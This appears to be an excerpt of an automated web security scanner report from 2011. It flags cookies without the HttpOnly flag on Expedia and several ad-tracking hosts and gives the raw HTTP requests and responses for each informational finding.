Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDU5OTE0NjsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=3tpwN5pqEIxFG/movUg3sYMFSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqFoxsGTRtrWQIzaIQRGQBg2cRpZm5IaYhxOSBsRpBB1I9IsfzF20i4WQBwWccmtCqGlHseWw7RaAgVSfBrLqxxNJUFQT2FAIruXQAzZAg0KXBbzqBAm6BF8sXGAIogZwrgYUBzWtBkoqxTN67GcNNGvYkAfwuRXEdum/BEOpxhOLUHsEpGzKq+fQoeZwsfO8BgwhhaX7/IUJtGhjZpTrRwFqFI09IG5Wo8iw5qYAcY6ACsMihNhAnjaYTIEv9F2E; F1=Bc3mC3kAAAAAmc1CAEAAJAgAAAAA6c1CAEAAJAABAAAABAAAAIAAgEA; BASE=Rgwq8yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrM!; ROLL=boAnr2C6PRAgcQG7fBnz6XH!

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 22:33:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=AdHxN5pqEIxFGpgovQg3sY0rSKMCItdhKgQ3WXoCIsY4FqACw3ghKgQ7NYoCIoLOGqACKGehKgwmhXoCI8eDGqACdDmhKgwohXoCIQY4FqACYimhKgA3WaoCIoa4FqACA9qhKggdeZoCI4fFGqACbTehKgwKOaoCIoN5FqACC9qhKgwtZaoCIE0rGqACFBqhKgQTaaoCIY4dGqACNLqhKUrqEoxsG9atrSQIzaw2RGQBg2cxDYm5IaAIxOCBsRphb3I9HsfzFg+i4WQBwWEDmtCqGPBseWw7RaoGVSfBrLqRMMJUFQT2FqBruXQAzZoG0KXBbzqhak6BF8sXGqBogVwrgY8nzWdBkoqRuP67GcNNGZSkAfwuRXsDum/BEOpR8MLUHsEpGdEq+fQoeZYTfO8BgwhB1V7/HUJtGLtZpTrxKEqFI09IGjQo8iw5qYoCY6wBsMiBofAnjaA6HEv9FgeqGhQ9fZAc; domain=advertising.com; expires=Sun, 05-May-2013 22:33:36 GMT; path=/
Set-Cookie: GUID=MTMwNDcyMTIxNjsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Sun, 05-May-2013 22:33:36 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Fri, 06 May 2011 23:33:36 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
18.132. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.expedia.com
Path:   /media/content/expus/graphics/home/wiz/wizard_booking_image.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/content/expus/graphics/home/wiz/wizard_booking_image.gif?01AD=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg&01RI=929884BBD25FA5E&01NA= HTTP/1.1
Host: media.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; U9Z5=CT-1; bn_u=UNASSIGNED

Response

HTTP/1.1 200 OK
Content-Length: 6764
Content-Type: image/gif
Last-Modified: Tue, 29 Mar 2011 15:31:23 GMT
Accept-Ranges: bytes
ETag: "801725c26eecb1:0"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=900
Date: Fri, 06 May 2011 22:34:07 GMT
Connection: close
Set-Cookie: U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; expires=Fri, 03-Jun-2011 22:34:07 GMT; path=/; domain=.expedia.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

.PNG
.
...IHDR.......k.....(.-P...3IDATx..]    tU..>ku....v|...    ....V......^.g...
b..Je..0CH@D.......H.......A.... .j.X[[..Z...>.?.w.}nN..Mn..k}.s.......g...-Kk#..&^..)]...e......r...Q.V.62c.x!...4.q..
...[SNIP]...
18.133. http://media.expedia.com/media/content/expus/graphics/launch/home/100824_newhp_wizard_topbtm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.expedia.com
Path:   /media/content/expus/graphics/launch/home/100824_newhp_wizard_topbtm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/content/expus/graphics/launch/home/100824_newhp_wizard_topbtm.gif?01AD=31asoEm0mc0hSRC_UQuxKylRSxdaJclQQgaMS7SoRW6V0YY2Si6IhXg&01RI=07F690EFF3E413C&01NA= HTTP/1.1
Host: media.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; U9Z5=CT-1; bn_u=UNASSIGNED

Response

HTTP/1.1 200 OK
Content-Length: 7260
Content-Type: image/gif
Last-Modified: Tue, 24 Aug 2010 16:01:27 GMT
Accept-Ranges: bytes
ETag: "80e5a29ba543cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Fri, 06 May 2011 22:34:07 GMT
Connection: close
Set-Cookie: U9Z5=31asoEm0mc0hSRC_UQuxKylRSxdaJclQQgaMS7SoRW6V0YY2Si6IhXg; expires=Fri, 03-Jun-2011 22:34:07 GMT; path=/; domain=.expedia.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

GIF89a2.J....Ul~'CX$Mj.........q..............8]v$Qn...x..7Zt....8\R]f1]}.=Z......edd............IT]....Bgp.........Jn...zyzmsx......\[[ANY...Nr....VVWOo.!Ps.=c.;b.Cg.@e.@f|{|RQR...i...8`.;a....Hl.Fj.
...[SNIP]...
18.134. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=18527;evt=15397;cat1=18280;cat2=18281;rand=7169916033744.81 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vt=9556:293096:548207:53962:0:1304340350:1|; adv_ic=BwEAAAB+p75NIAYGAAFJAAC0ViAHIAsDAAAAAA==; lyc=BAAAAARv+75NACAAAWVfIASgAARbUwAAcuAKF0AAAqAsv2AvAJAgI8AAAZdVwAngBRcDz08AAA==; pluto=822523287793|v1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:33:37 GMT
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=BgAAAASbLb9NACAAAZBTIASgAAWXVQAAnyzgCRcFz08AADELgBcBZV+gLCAAAFsgOwAe4AoXQAACQHfEYF8BX0hADYAAAWlHgAdAAOAFFwEAAA==; domain=.fastclick.net; path=/; expires=Sun, 05-May-2013 22:33:37 GMT
Set-Cookie: pluto=822523287793|v1; domain=.fastclick.net; path=/; expires=Sun, 05-May-2013 22:33:37 GMT

GIF89a.............!.......,...........D..;
18.135. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://om.expedia.com
Path:   /b/ss/expedia1/1/G.9p2/s91449721802491

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/expedia1/1/G.9p2/s91449721802491?[AQB]&ndh=1&t=6/4/2011%2022%3A33%3A33%205%20300&ce=ISO-8859-1&cdp=2&pageName=Home%20Page&g=http%3A//www.expedia.com/default.asp&ch=home&server=www.expedia.com&cc=USD&c12=80312807C795402E93C5016D2A2A3E1B&v17=Home%20Page&v18=Home%20Page&v32=Home%20Page&c34=658.0%7C820.0%7C808.1%7C843.1%7C976.0%7C1055.0%7C1110.0%7C975_0&v34=658.0%7C820.0%7C808.1%7C843.1%7C976.0%7C1055.0%7C1110.0%7C975_0&c50=G.20110422&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Fri, 06 May 2011 22:33:39 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E23BA185013347-6000011540167CC6[CE]; Expires=Wed, 4 May 2016 22:33:39 GMT; Domain=.expedia.com; Path=/
Location: http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491?AQB=1&pccr=true&vidn=26E23BA185013347-6000011540167CC6&&ndh=1&t=6/4/2011%2022%3A33%3A33%205%20300&ce=ISO-8859-1&cdp=2&pageName=Home%20Page&g=http%3A//www.expedia.com/default.asp&ch=home&server=www.expedia.com&cc=USD&c12=80312807C795402E93C5016D2A2A3E1B&v17=Home%20Page&v18=Home%20Page&v32=Home%20Page&c34=658.0%7C820.0%7C808.1%7C843.1%7C976.0%7C1055.0%7C1110.0%7C975_0&v34=658.0%7C820.0%7C808.1%7C843.1%7C976.0%7C1055.0%7C1110.0%7C975_0&c50=G.20110422&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Thu, 05 May 2011 22:33:39 GMT
Last-Modified: Sat, 07 May 2011 22:33:39 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www170
Content-Length: 0
Content-Type: text/plain

18.136. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/noscript.gif?D=DM_EVT%3DCSM_Expedia_LP HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=9b6b0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d7db&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; rsiPus_cUAg="MLsXrtEupC5v4JDWbm5SF4iCa9rxq92nU/WOr6kAXZYdLpPAQvnyqW118N7oMEOiC2a+Qitt1jCSQnt7wOLuFf/9TQPsfq6IyG5KAtGyxR3fC69ZIS1PEfZ7+RJPbmgi5/Do4ttQz08XO1UZi7xW2INSPBRMu/rnPp04+54Ys4dei76PNAqSipahtYUfnrULkB+5OvuWzwKUC5dvku8yoxjK9eqMv+qsudi6yDI5p7sjklqfA/Df4499H+aU47uX/ZStvm7s0bSjla+AwzWAysWR5lO0C6CV3XcHBk4XAJoLy17PEAhkXQrA5UZbouz0UH099/lxSt54s7u/1vi/Ooc6ZsdHYnkAmIE7OjXRhH5swOnx+Qe7TQNTY5avAup317qWXxpxHGJHaYXIBQgZDvVvP1/FdYHpe4ELzEm01fLjZ3NRUu3RLcxJe/LWkVmHz79Zn9KKPtd8TZxCCYd1SF0BsJd/w4RxAXd8u6LUBqIMTYJLRCFBZYAqfyg3pMk+tHsbPBAY+t4e0y5XfrgZeOS5LS0raNTRDvmgWWyrK/P3YcYuQx+1XxK1YTDnTUoMKeILlN/WyNsBDbEYkH1exWL76rR83Bi3+v2FqFxztf6n5/2gdRHjcEt9bVnJ4z3dKF3kglsKfCM6oHY8rFN7qcjUzF9dx5DdQ3yk9RA="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkS/GtHFajpUjRHJppcTQ/E+fDv3TBS3u3eKtw/qV68iFxwFHQSUXJh/TEDlqK5ymryWN1lLpjgHRFDSYttD59YZFrXOXgP3z1GpnIeFgtFDR1F1h1DvPJ6jGxiMDbAnxQhvYqAwMe3iYLqU5GS2b8LfrTbx7uRJOZcXZTF1nqAhc9j1XANGppgAkqLrW5J/DkaoiGFOnArblFlMxnIUs81A34N/6VKULJ5NXcgY4g9jLOtCz0A2zRfBV0tB6nig79jyxsPK/BtufPnOuytnDMGwwiEdVEfx6xS+gdhVS/YoP8gws4gSC0AJdMoSjsujh74M9+Fuy742S9LEO0odVcgP8nwKkbsPsv3MIMTgRwUByQS0+3PTu18ZNX15PFr3nkMs5yPDt2381kVtM3tUsb7UTaDxWlFawllYsd+K30dHBKmeOvEyOfWttKqC8T1WwfifCTg5OqGJEWYbTZJKrVqzIxoqCSdeInRhO8LVs1qCHv/xxr5klEDkmKfHvF3yACOKWqmWc99TGbMUwf1jXvnMacDDEIRle75AsgC1t0n9TOjQlEvQUGZUlrBNuwrAyA8WHgji5OTrwi6ZAOSH/kv/L1brD7LtY7KfEaHdjvNdTzvoBUQMG4UTO6tV8OPsAUbmXYKs6T9V0kUdHDxS5IPWKMbw64OOcJPQgyRxyqJsiuBp3dvkWmsDV+KduhariE+vHGWgkxjV3chDQ3HlznmZrWkDHUMxVsE5mlY8EEUQt0ADLtrW3uR1r4wH3z3ZIdpJAGNmiIVyRr2c2b7jtBhTZxAAlNf7l7f35RlM2r3iTLGaF16IS79K9XrMEkuBHsy/k9wS+yaRUPCDErkqNr9YH2bA5/m2lDsmX2vxXhzSVPIsZH46KEZTqbjaFkaMVUv/ITp08VtIAQ1Yvu8ZknO30xfvR4vAy1AWEvvRf2fTQTa86Cxadw7P5qlBPGbbc96CWkKYIaCHYlvv56SO55p0Bo3OSWyjxverGSQYL67FQcst0Y+Jf/kIY+hq/65Cw5pVhi+rOWA5T/otP69RNqpLBD3wut5wpUIOU3A3cz+Fww/cmAfldRXnDpjDHyOUTv16cufUECTFP4HtE7b0vSWonFxeUXUs0PotTR+7l6VjT1pd6km8G3O6Jy+CinadIyS1ZkYM7x6spOGE5UiyQvx8Zs2WjO/p+duPiDfcEZGtR+HUDufru+EUMxg4w6AcWPnyFQbFw5FZSvULDb31fy7NREGAnb8nazQEJ7uSv7XT8wDJIORNgj0zbeAPjKWAlyPP3oRqS3CgRk7KsmlGuzBtB/H49kpYMT"; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de3fbf4&1&10592&4dbcb06d&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; rsi_segs_1000000=pUP15EOBMAIQf7vIQCJHhljPSEXWkLVrUBheImkRhPjVgC6MFxwKGkF6NHVB/2BO08M9QmiQSflMS0CoObMWApxrXoQc0Ll6OGkZNKFAsp2ifHChYPLAFYGM93TVLM6e+l04mihRIghaEp/YJjXEgGdsR6OjyXYIE4ccAUGnkj4VlvOr5Cw1oYSan8w0WfgHlu+8NIqCzGcqyYa9BF9YultYm/4mL4iRx/lFdc+aOmY1SRcLv60a9tJODAd0nF/i9101BB6NatVxoe1DjYfTUdd9N17JIivfPw22EIbQcVnPegF1SCok1OvyfnDR5SF1kLQ+okL5SpO7PmoTDHrWOqcBq6tcqCgkXnct+60mbddfLnCTenuSt0zS65iKrXurrLCAy0ZDKA896UwvNGoiBy0Ua8lt4RsDVNLyYBpuVD/LwytDRDz4V8uvQTl6zXeuUmyyeWpazfizP0TYzGh3YoV0j4MIz5lKfDFE4bHm5LafdV83GuKIAxww/yGxQiq11e0+Bq/l; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; rtc_2MML=MLsXtzE1ZxpnJ5GrHvmWF/CWgLZrYKUib5slCPedGNAwVTi74gkGr2Ipj4EWp+/DHqged2X1aG4UUDn9Sek+jWM8P1olTaq7ej6Dk/7O6T/gImgqfhS/fa8kwEqZhMLA7rr5dbctvj4KRqaT3jlzVpIPTLPOZlpRsFQnGcNcik0Vr/9ChiL9/dR+6TNbTGzp54iTMx9i7IA/M6syQEezQPwO4YUSLj2DbGhi/4Jolbl+6ZOTVx+W8cslzKfYsFHmuoyeGBwbsd1bTAxTphe1k40xYV92B45jmgrgB6/H89z6SRhp1GeG4kWKDw5CPfa7A/4WQDYPDQFTsZ2ttxQJ/rnIA9pRw4LfgHHRwLlNBUloulnJRNF8kdhJjEPkWfTqi1zPbesQx1fqJXeZJtyPKOqtZNI9V035IwXrvoyuFZQdQAXadNNCH9RWSxqd6nTdSu5kXKxz8xb0tYwx0LYb5txuGgmTHdyh5ie9d7thoIb/MJtZeGMLDzEOb5TkibpUjhNrG7OFF96RGpt6tIJUFbcNraCnAT46IQyNapge/OP42wmo1ckMPxlqP05nnC68WzHeGJh9k5C3WXvZpirNOd0DPxV/g/fG+5qiuL2keoExgq6g1lguUz59bg/95Hp9C9+xAs+noKPRebSc49l4l4C4tq2+eeO8HyiVB+lgSAXFESqLDcwX9oqqKLYjjqsBoHx8SrQgsDgIMV+i/N5Bdi0Ua4hBlSKh17HuEasBYtI+CzD01Uhdk/bZkXxOO/SdEn9af62gKRR4Ah33CN7MTu3l/iOkdKeYI3szmc9Yd9ozmo1pzFdrQQkKyZJeSXqZpO3p+s5n8djXqBRpmUB8YZR0VKraNlnG2tQkzx//zv339tnJCBbXR+pBEmq8L5la7a/4YaD4szeS8uTzJX0qOIEuU+AA0J3FaCkrKjdYFIAaylldJlPjIy/Q8MgnXvF7B6CosPAzzo/+2DM5jv2yh0LM3jnGkQO/A2SXqahqoAG37uql4CWsmFmZgE1furniCrruzAXaEy5s0AKznPjllNVwv1mofZOCc+h6kQCduxK+7RPxbgOHm4lLlkOV/cCKhs+1T6l+wECUFBllnwyRZ5h9E3S7JFv8gy00JNu++Qmff4WRDZCc439hxefv8hAm0PG+oWPh3uD9BFWY9mIYSZ9/3OkCQru9DqyUhOSSuBVAmpXh/c7tlYTxiToRXS8LcruHYtO+mKfZxxTs+llGpQ32PiOD6FseycwIpd2XeFPbLkYwnV45QMN+GQNS1DnslVWGvwSo+L7BVvVJjhq2qvVk0cVKwB43EcMRu9sBYvmdLvuZZUDzEVE54p2XApRprYWiMwkj6FIefpFbiHeNa6utEJv9elonE9IplVVQTbwaIxivxbxSWlJT4jFP84eoToKwJpylz5YY807t92pRWCsL0nbgNqb65Lf2Q5+0iFejG2kxa4Cu8dQrUJl27A+dH4x0UklDoA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_2MML=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJEOheXIQVvUb5Bw3nLcSe/rWsx3DUgOajZMjUvBNkraeXO/p2pP6LNDeNFSZwK4/3mCVJfviaRS76OdgBdRLEO5ZoN0OAiVEuPKIPy7KVrvvoekFAdus9/RVdaNTr8DRZWq8v5lgFy81IhCEz3GO6SfeEvGPB/ePW28Rje+UaUKTzAr3aqJAP7vkZoWH+PGgzZ7+DLapvhC1VjPlIuK+MbylPCFjhhhHNirmG+ViZWCfBUFZgh51jkrN+lduMho5P/OQ5DN6QMBPOIfTUdfPAnHQEOxj62Zx5+tL9ciLqJ95kZmpzpw+s497N82TjVKL4xsXgmJPlK2b3ksV0A6vIUV15Mzo6cez9TOlt4e77ktoRZkzw4/k3KTKs/BGC3Kukzgrbhw3ckJ5/EJ1625ddtFcIBlnAS1v6sE/ucZ3wM7B8+MbCqQn6Nmy5mlI1/lVqRJybwsJMIhQysotG/XwWXx4Lmrrj/LlkFWCOuBr7cCrci3HZn5R9mp34YjB0TPr/dghLv44h5AjvA==; Domain=.revsci.net; Expires=Sat, 05-May-2012 22:35:37 GMT; Path=/
Set-Cookie: 